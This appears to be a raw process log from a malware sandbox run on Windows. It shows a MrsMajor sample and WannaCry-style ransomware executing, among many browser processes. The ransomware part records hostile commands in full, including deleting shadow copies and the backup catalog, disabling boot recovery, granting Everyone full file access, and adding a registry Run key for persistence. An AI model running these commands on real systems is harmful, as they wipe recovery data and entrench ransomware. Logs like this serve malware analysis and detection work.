"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\57EA.tmp\57EB.tmp\57EC.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\57EA.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\57EA.tmp\eulascr.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3920 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Users\Admin\Downloads\MrsMajor3.0.exe
"C:\Users\Admin\Downloads\MrsMajor3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\B998.tmp\B999.tmp\B99A.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\B998.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\B998.tmp\eulascr.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8156 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2672 /prefetch:8
C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 251591728301636.bat
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Users\Admin\Desktop\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nzfbkoaczl750" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nzfbkoaczl750" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
C:\Users\Admin\Desktop\TaskData\Tor\tor.exe
"C:\Users\Admin\Desktop\TaskData\Tor\tor.exe"
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\TaskData\Tor\tor.exe
"C:\Users\Admin\Desktop\TaskData\Tor\tor.exe"
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\187a48fb6ed94674806ae2c81fdf1579 /t 5072 /p 2968
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7424 /prefetch:1
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3760 /prefetch:8
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7440 /prefetch:8
C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.5.6.exe
"C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.5.6.exe"
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.0.821751682\1183068532" -parentBuildID 20240930230510 -prefsHandle 2264 -prefMapHandle 1768 -prefsLen 19247 -prefMapSize 240500 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {db38af19-cb0d-4edf-b82f-b2efa43a944a} 932 gpu
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.1.1308033628\1546300922" -childID 1 -isForBrowser -prefsHandle 2920 -prefMapHandle 2936 -prefsLen 20081 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7aaf1cb3-5bc4-4f22-bd41-fe452829ecf4} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:38ce737ee4b318596017f3e8cb1c4942caf07c2626f75dbefe86b69f74 +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 932 DisableNetwork 1
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.2.9767477\1911551208" -childID 2 -isForBrowser -prefsHandle 2692 -prefMapHandle 2796 -prefsLen 20897 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a0a94fa8-e58f-4f67-a0cf-18fa8fd1ae48} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.3.2031419326\1620356290" -childID 3 -isForBrowser -prefsHandle 3156 -prefMapHandle 3136 -prefsLen 20974 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a22e2b0e-94cf-4832-9b51-c5dce9565f9c} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.4.1363172363\1752700806" -parentBuildID 20240930230510 -prefsHandle 3900 -prefMapHandle 3912 -prefsLen 22697 -prefMapSize 240500 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {31fc0888-7d68-43fd-9107-7e96b73e9224} 932 rdd
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.5.17786451\646521068" -childID 4 -isForBrowser -prefsHandle 4060 -prefMapHandle 4044 -prefsLen 22264 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {1f629c63-265a-4bec-8435-ac2c77957a0f} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.6.699961299\455566899" -childID 5 -isForBrowser -prefsHandle 4236 -prefMapHandle 4136 -prefsLen 22264 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {0cac5389-a930-4559-bb3a-6843ea3907e3} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.7.1747767737\2144489501" -childID 6 -isForBrowser -prefsHandle 4440 -prefMapHandle 4444 -prefsLen 22264 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {b7ff64ad-0d05-47af-80e2-d4ff2e985da8} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.8.2127066762\1565863593" -childID 7 -isForBrowser -prefsHandle 4836 -prefMapHandle 3976 -prefsLen 22622 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {33671a99-e676-471e-8b01-0ce10040441c} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.9.1789249400\1974155352" -childID 8 -isForBrowser -prefsHandle 1864 -prefMapHandle 1940 -prefsLen 22836 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {b6cdc2da-50cb-4353-a1b0-9ea8ddd7c56d} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.10.1753260838\253256170" -childID 9 -isForBrowser -prefsHandle 5000 -prefMapHandle 5004 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {35d4dfac-742c-4cd8-95e0-ba5a9052640d} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.11.1541742406\766039593" -childID 10 -isForBrowser -prefsHandle 4528 -prefMapHandle 4428 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ebbbf5ba-c269-4eaa-b871-20abe7d6b369} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.12.676502640\196756077" -childID 11 -isForBrowser -prefsHandle 5212 -prefMapHandle 1948 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2dec75eb-58c0-4bc3-b78b-5ff61caa48d9} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7676 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
